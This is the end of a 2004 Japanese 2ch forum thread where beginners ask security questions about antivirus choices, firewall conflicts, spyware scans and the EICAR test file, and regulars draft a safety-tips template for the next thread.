http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/7 の6)、7)を実行。

これからエロサイト見るときはOperaかFirefox使え。
http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/501-502

960 :957:04/05/27 04:56
>>959
ありがとうございます!
明日(もう今日ですな)伝えて、やってみます!!
見てて気の毒なくらい凹んでたので…
てか、俺は未だに98なのでXPの勝手が今一つ分からなくて
ろくな助言も出来なかったもので助かります〜

961 :名無しさん@お腹いっぱい。:04/05/27 09:08
>>957
>FAXの手順を踏んでも駄目だったので試してみようかと思うのですが。
それは恐らく「FAQ」の手順。

962 :名無しさん@お腹いっぱい。:04/05/27 10:16
FAXで指示が送られてきたのかも知れんぞ。

963 :名無しさん@お腹いっぱい。:04/05/27 11:35
ウィルスソフトを30パック程購入しようと考えているのですが
↓これってどうなんでしょうか?
ソースネクスト
ttp://sec.sourcenext.info/products/

ウィルスバスターとか、ノートンと違って
やっぱりヘボいのでしょうか?

964 :名無しさん@お腹いっぱい。:04/05/27 11:57
>>963
製品はへぼい。会社は札付き。そんなもん入れるならフリーの
AntivirかAVG入れとけ。

金出すならシマンテックのNAVかトレンドのVB。シマンテックの
NISはおまけ機能満載で素人受けを狙ったが激重、激遅、不具合
満載で評判悪い。

いずれもセキュ板に専用スレがあるから情報収集してみるといい。

965 :名無しさん@お腹いっぱい。:04/05/27 12:18
>>963
30パックくらいならまだ良いけど、数が多くなってくると各PCのパターンファイルを常に最新状態にするって結構面倒だぞ。
ユーザーが勝手に更新設定変えたりするから。
ひどい場合は「重いから」とか言って、アンチウイルスソフトを停止していたりするw

ここで質問するぐらいなら、適当なベンダー呼びつけて相談した方が良い。
ベンダーによっては、メンテナンスの手間を減らせる多ライセンス用のサービスがあったりするからな。

つか、初心者スレで聞く事じゃないなw

966 :名無しさん@お腹いっぱい。:04/05/27 14:34
>>963
30パックもか。もし企業で導入なら、これはかなり痛いかも。
ソースネクストスレので拾ったけど。
・administrator権限でしか使えない。

967 :名無しさん@お腹いっぱい。:04/05/27 15:23
>>966
ってー事はさ、初心者って普段はAdmin権限で使ってるんかね?
HomeじゃなくProを選ぶ様な人なら、その辺はわきまえてそうだけど。

968 :名無しさん@お腹いっぱい。:04/05/27 16:15
【ソースネクスト】ウイルスセキュリティ2004 Part7【K7】
http://pc5.2ch.net/test/read.cgi/sec/1082313491/

いつのまにか「インドの山奥で開発…」とかいうほうのスレ
は消えていた。

969 :名無しさん@お腹いっぱい。:04/05/27 16:18
公開暗号化方式を使って、盗聴、改ざん、なりすましをどのように防ぐことができますか?
どうして改ざんされていないこと、なりすまされていないことが暗号化によって保証されるのですか?

970 :名無しさん@お腹いっぱい。:04/05/27 16:51
>>969
ググってこい。この場で説明させる気か。

971 :名無しさん@お腹いっぱい。:04/05/27 16:53
>>969
宿題か? ここらで勉強しろ
http://www.jtw.zaq.ne.jp/kayakaya/new/kihon/text/kagi.htm

972 :名無しさん@お腹いっぱい。:04/05/27 16:55
パソコンない。 どうして改ざんされていないこと、なりすまされていないことが暗号化によって保証されるのですか? ここだけでいいから教えてよ

973 :テンプレ案…:04/05/27 16:57
インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等できる
   だけ詳しく報告。(例)「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜
   〜のルータを導入しているが、〜ができなくなった」等
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ マルチポスト(他スレ、他サイトとの同時質問)禁止。他スレから誘導された場合は、
   その旨書くこと。
 ・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
 ・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
・ウィルスにやられた→【正式】ウィルス情報&質問 総合スレッド☆Part19
  http://pc5.2ch.net/test/read.cgi/sec/1083586576/
・IEが乗っ取られて変になった→エロサイト見てたら…助けてください!part25
  http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/
  ↑のまとめサイト http://haiiro.info/my/text/template.html
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc5.2ch.net/pcqa/
・2ちゃんねるの仕様の質問→ http://etc.2ch.net/qa/
・2chスレッドタイトル検索→ http://www.ruitomo.com/~gulab/k.html

974 :名無しさん@お腹いっぱい。:04/05/27 16:58
【過去ログ】
part41 http://pc5.2ch.net/test/read.cgi/sec/1084345263/ 前スレ
part40 http://pc5.2ch.net/test/read.cgi/sec/1082207307/
part39 http://pc3.2ch.net/test/read.cgi/sec/1080480132/
part38 http://pc3.2ch.net/test/read.cgi/sec/1078216939/
part37 http://pc.2ch.net/test/read.cgi/sec/1076728395/
part36 http://pc.2ch.net/test/read.cgi/sec/1075135866/
part35 http://pc.2ch.net/test/read.cgi/sec/1072675686/
part34 http://pc.2ch.net/test/read.cgi/sec/1070035602/
part33 http://pc.2ch.net/test/read.cgi/sec/1068471471/
part32 http://pc.2ch.net/test/read.cgi/sec/1066831852/
Part31 http://pc.2ch.net/test/read.cgi/sec/1064799419/
Part30 http://pc.2ch.net/test/read.cgi/sec/1063081161/
Part29 http://pc.2ch.net/test/read.cgi/sec/1061521014/
Part28 http://pc.2ch.net/test/read.cgi/sec/1059642238/
Part27 http://pc.2ch.net/test/read.cgi/sec/1058283714/
Part26 http://pc.2ch.net/test/read.cgi/sec/1056288419/
Part25 http://pc.2ch.net/test/read.cgi/sec/1054458698/
Part24 http://pc.2ch.net/test/read.cgi/sec/1052123602/
Part23 http://pc.2ch.net/test/read.cgi/sec/1050042334/
Part22 http://pc.2ch.net/test/read.cgi/sec/1047648810/
Part21 http://pc.2ch.net/test/read.cgi/sec/1044609731/
Part20 http://pc.2ch.net/test/read.cgi/sec/1042516088/
Part19 http://pc.2ch.net/test/read.cgi/sec/1040876540/
Part18 http://pc.2ch.net/sec/kako/1039/10390/1039053088.html

975 :名無しさん@お腹いっぱい。:04/05/27 17:01
そうか

976 :テンプレ案…:04/05/27 17:03
【初心者向けセキュリティの常識】

■Windows Updateを実行し、「重要な更新」は必ずインストールしておく。
■Internet Explorer:つねに最新バージョンにアップデートしておく。(IE5.5sp2、
 6.0sp1以降推奨)
■安全なブラウザを利用する:
 Opera http://download.opera.com/
  Opera日本語ファイル http://my.opera.com/community/customize/langs/
 Firefox http://www.mozilla.org/products/firefox/
■怪しいメール:開かずに捨てる。IE5.01SP2,IE5.5SP2,IE6.0以上でなく
 Outlook Expressを使用している場合、メールをクリックしただけで感染する場合が
 あるので、プレビュー機能は必ずオフにしておく。
■アンチウィルス:常に最新パターン(ウィルス定義ファイル)に更新してないと意味なし
■不審なURL対策:
 URLの文字列をよく見る。sex、loli、search、virusなどの文字列が入っていないか?
 鑑定→ラウンジhttp://ex6.2ch.net/entrance/ へ。その他「勇気」「鑑定」等の
 キーワードで鑑定スレを検索。
 初心者が誤ってクリックしないよう、ウィルスやブラクラへ直接リンクを張らないこと。
 リンク先を直接見る→「対象をファイルに保存」→メモ帳で一度開いてみる。
■アダルトサイト対策
 インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
 → ActiveX、JAVA、スクリプトを全て無効
 ブラウザハイジャッカーの99%はIE以外では作動しない。IEの部品を利用しないOperaや
 Firefoxを利用するとトラブルを防げる。
■最近はウィルス以外にブラウザを乗っ取って個人情報を盗んだり、エロサイトに飛ばし
  たりするスパイやハイジャッカーが流行している。アンチウィルスソフトだけでは防げ
  ないのでアンチスパイソフトも入れておく。参考 http://haiiro.info/my/text/template.html

977 :テンプレ案…:04/05/27 17:05
この後は今のテンプレ>>5あたりから貼ればいいかと。お邪魔しますた。

978 :名無しさん@お腹いっぱい。:04/05/27 17:22
WinXP、IE6SP1使用。光回線でプロバイダはぷららです。
ファイアーウォールはZONEALARM入れてるんですが、
重いので無線LANのエアステーションいれたときについてた
アタックブロックというソフトに頼っていたら、
とつぜん青い画面に英語で書いてある画面がでて、
(一瞬しか出ないのでなんて書いてあるかわからない)
勝手に再起動してしまいます。
ZAを入れていると起こらないのですが、PCが異常に重いです。
もしやサッサーかと思ってサッサー感染チェックしてみましたが感染していませんでした。
これは一体何なんでしょうか?

ちなみにそのPCは無線LANではなく、有線LAN接続でインターネットに繋いでいました。

979 :名無しさん@お腹いっぱい。:04/05/27 17:35
>>972
だったら本屋でも行って「暗号と確率的アルゴリズム入門」なり「暗号理論入門」なり適当な本を探してこい。
こんな所で説明すると、いくらスペースがあっても足りないぞ。

980 :名無しさん@お腹いっぱい。:04/05/27 17:38
>>978
ファイアウォールがコンフリクトしてるんじゃないか?
別のファイアウォール入れる前に、ZAをちゃんとアンインストールしてるか?

981 :名無しさん@お腹いっぱい。:04/05/27 17:43
>>980
アンインスコはしていません・・・。
でも今までZAを切っていても、こんな現象は起きなかったんです。
昨日から突然起こるようになって、今はZA入れてないとすぐ勝手に再起動してしまいます・・・。
やっぱりコンフリクトなんでしょうか。

982 :名無しさん@お腹いっぱい。:04/05/27 17:49
>>981
恐らくコンフリクトだ。
ZAとアタックブロックを両方ともアンインストールして、必要な方だけインストールし直せ。

PFWはコンフリクト起こしやすいから、複数を同時にインストールしないってのは鉄則だ。

983 :名無しさん@お腹いっぱい。:04/05/27 17:52
只今テンプレの誤りをチェックしています。
次スレを立てる方はもうチョット待ってください。


984 :名無しさん@お腹いっぱい。:04/05/27 17:57
>>978
青画面が出たのなら、Windowsがログを残してるかも。
次に出た時に一瞬じゃなくよく読みたい場合は、コントロールパネルから設定可能。

985 :983:04/05/27 18:07
テンプレ修正が多々ありますた。
次スレ立てる人、後は任せたぞ。

>>3 アドレス変更
・不審なURLの鑑定→ラウンジ http://ex5.2ch.net/entrance/ へ。

>>4 リンク切れ
・くだ質FAQ

>>7 アドレス変更
ICEWatch http://www.angelfire.com/falcon/icewatch2000/

>>7 【日本語パッチ 等】 以下を書き換え
【フリー版、体験版、日本語パッチ 等】
ZoneAlarm英語フリー版 http://www.zonelabs.com/store/content/company/products/znalm/freeDownload.jsp?lid=zadb_zadown
ZoneAlarm日本語フリー版、Pro評価版 http://jp.zonelabs.com/download/index.html
フリー版→「ZoneAlarm(無料)」、Pro評価版→「評価版」
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

>>8 リンク切れ
Shields UP ! の日本語解説サイト

>>8 アドレス変更
Firewall 解説サイト Fire & Forest http://eazyfox.homelinux.org/

>>9 アドレス変更
ダウンロードソフト(download板) http://tmp3.2ch.net/download/

>>976 アドレス変更
Opera http://opera.livedoor.com/download/
鑑定→ラウンジ http://ex5.2ch.net/entrance/ へ。その他「勇気」「鑑定」等の

986 :名無しさん@お腹いっぱい。:04/05/27 18:08
>>982
調べてみたらアタックブロックはルータのファイアウォールみたいなんですが、
やっぱコンフリクトしますか?

>>984
コントロールパネルから設定しておけば、一瞬じゃなくてその画面が読めるということでしょうか?

987 :名無しさん@お腹いっぱい。:04/05/27 18:09
ノートンいれたいんですけどどれを入れたらいいんだかわかりません。
ノートンアンチウイルス2004でいいんですか?それとも優待パックついてるほうが
いいですか?


988 :名無しさん@お腹いっぱい。:04/05/27 18:14
OS、使用中のノートン製品・バージョンを整理したら、ここに行ってくれ
【ノートン】インターネットセキュリティ Ver.47【2004】
http://pc5.2ch.net/test/read.cgi/sec/1085387157/l50

989 :名無しさん@お腹いっぱい。:04/05/27 18:17
>>987

【ノートン】インターネットセキュリティ Ver.47【2004】
http://pc5.2ch.net/test/read.cgi/sec/1085387157/


990 :名無しさん@お腹いっぱい。:04/05/27 18:36
>>979 そうか

991 :名無しさん@お腹いっぱい。:04/05/27 18:43
>>986
>コントロールパネルから設定しておけば、一瞬じゃなくてその画面が読めるということでしょうか?
そう。「システム」のどこか。
些細な質問ならググってくれ。

992 :名無しさん@お腹いっぱい。:04/05/27 23:34
パソコンを購入したばかりの者です。
念のため、スパイウェア対策ソフトを入れてスキャンしたところ、
20〜30程のスパイウェアが検出されました。
購入して自分で入れたソフトはクイックタイムやリアルプレーヤー、
あとは以前使っていたパソコンのバックアップデータを入れただけです。
(そして結局削除したのですが、いくつかは削除できないものもありました。)
まだほとんど使用していないパソコンでも、こんなに検出されるものなのでしょうか?

スパイウェアスレとどちらに書くべきか迷ったのですが
こちらで質問させていただきました。
もしスレ違いでしたらすみません。


993 :名無しさん@お腹いっぱい。:04/05/27 23:57
次スレまだぁ?(・∀・ )っノシ凵 ⌒☆チンチン

994 :名無しさん@お腹いっぱい。:04/05/27 23:58
>>992
とりあえずOS書きましょう

995 :992:04/05/28 00:23
すみません。
OSはWindowsXPHomeEdition、使用したソフトはAD-AWAREです。
削除できなかったものは控えていなかったので分からないのですが、
c:\windowsの中に入ってしまったもののいくつかが
削除できなかったようでした。
その他に、ブラックリストのアイテムのURLが〜?というような
コメントがついたものも検出されました。
よろしくお願いします。

996 :名無しさん@お腹いっぱい。:04/05/28 00:53
三ヶ月前にやっとこ98SEからXPなパソコンに買い換えたものです。
ノートンが付いてきたのですが、幸か不幸か今までなんの反応もありません。
ウィルス感知するとどうなるのか試してみたいのですが、
安全(?)にノートンが反応するのが見れる場所ってありますか?

997 :名無しさん@お腹いっぱい。:04/05/28 01:22
そんなことより2ちゃんのほうが5/29から書き込みできんぞ
もしかしてあぼーん?
http://qb5.2ch.net/operate/

998 :名無しさん@お腹いっぱい。:04/05/28 01:27
>>996
あるよ。テストウイルス EICAR↓
ttp://www.eicar.org/anti_virus_test_file.htm
・・・心配ならググれ!

999 :2ch運営情報によると…:04/05/28 01:56
2ch 鯖移転問題 hosts ファイル書き換えで対応?
http://dempa.2ch.net/prj/page/browser/ikan.html

ここしばらく2chの反応に異常が出る可能性があるらしい。レスを送信しても
反応がないからといって焦って何度も「書き込み」ボタン押さないように。


1000 :名無しさん@お腹いっぱい。:04/05/28 01:59
次スレテンプレ案、リンク修正は、
>>973 >>974 >>976 >>985 を参考にタノム

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

311 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)